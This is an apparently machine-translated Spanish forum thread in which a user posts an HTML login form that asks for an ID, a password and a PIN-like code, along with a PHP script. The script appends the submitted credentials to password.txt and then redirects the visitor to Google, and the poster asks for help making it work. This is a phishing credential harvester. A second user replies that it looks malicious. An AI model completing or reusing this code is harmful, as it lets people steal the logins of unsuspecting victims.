Ayuda con mi formulario de entrada!

• zerkky
  • Born
  • Born
  • No Avatar
  • Status: Offline

Nota Mayo 16th, 2010, 1:36 pm

Muy bien, así que hice un formulario de login con 3 cuadros de texto. También creé una imagen como el botón de enviar. Cuando se hace clic en enviar, quiero que el php. Página para almacenar el llenado datos del formulario en un documento de texto al mismo tiempo volver a dirigir a otra página (por ejemplo: ahorro de password.txt y volver a dirigir a un sitio como google). Su no funciona, así que no estoy seguro si mi HTML es en mal estado o mi PHP. Espero que te puede ayudar!

Mi formulario HTML:
Código: [ Select ]
<form name="login" id="login" action="login.php" method="POST">

User ID
<input type="text" name="txtId" id="txtId" class="input" value="" tabindex="1" size="20">

User P/W <input type="password" name="txtPassword" id="txtPassword" class="input" value="" tabindex="2" maxlength="12"><BR>

User PIC <input type="text" name="txtPIC" id="txtPIC" class="input" value="" tabindex="1" size="20">

<input type="image" src="login.gif" name="image" value="submit" alt="Submit button"></div></div>
</form>
  1. <form name="login" id="login" action="login.php" method="POST">
  2. User ID
  3. <input type="text" name="txtId" id="txtId" class="input" value="" tabindex="1" size="20">
  4. User P/W <input type="password" name="txtPassword" id="txtPassword" class="input" value="" tabindex="2" maxlength="12"><BR>
  5. User PIC <input type="text" name="txtPIC" id="txtPIC" class="input" value="" tabindex="1" size="20">
  6. <input type="image" src="login.gif" name="image" value="submit" alt="Submit button"></div></div>
  7. </form>

Mi script PHP & #058;
Código: [ Select ]
<?php
$fp = fopen(”password.txt”, “a”);
fwrite($fp, “Username:$_POST[txtId]\tPassword:$_POST[txtPassword]\tPIC:$_POST[txtPIC]”);
echo “<HTML>

<FRAMESET cols=\”*\”>
<FRAME src=\”google”>
</FRAMESET>”;
?>
  1. <?php
  2. $fp = fopen(”password.txt”, “a”);
  3. fwrite($fp, “Username:$_POST[txtId]\tPassword:$_POST[txtPassword]\tPIC:$_POST[txtPIC]”);
  4. echo “<HTML>
  5. <FRAMESET cols=\”*\”>
  6. <FRAME src=\”google”>
  7. </FRAMESET>”;
  8. ?>
  • Anonymous
  • Bot
  • No Avatar
  • Loc: Ozzuland
  • Status: Online

Nota Mayo 16th, 2010, 1:36 pm

• joebert
  • Sledgehammer
  • Genius
  • No Avatar
  • Loc: Florida
  • Status: Offline

Nota Mayo 16th, 2010, 2:24 pm

Cuidado para explicar el panorama general sobre lo que está haciendo?

Teniendo en cuenta su último hilo sobre nombres de usuario, además de raspado de ésta acerca del registro los nombres de usuario y contraseñas, parece que están tramando algo malo.
Strong with this one, the sudo is.

Publicar Información

• Total de mensajes en este tema: 2 mensajes
  • Usuarios navegando por este Foro: ScottG y 283 invitados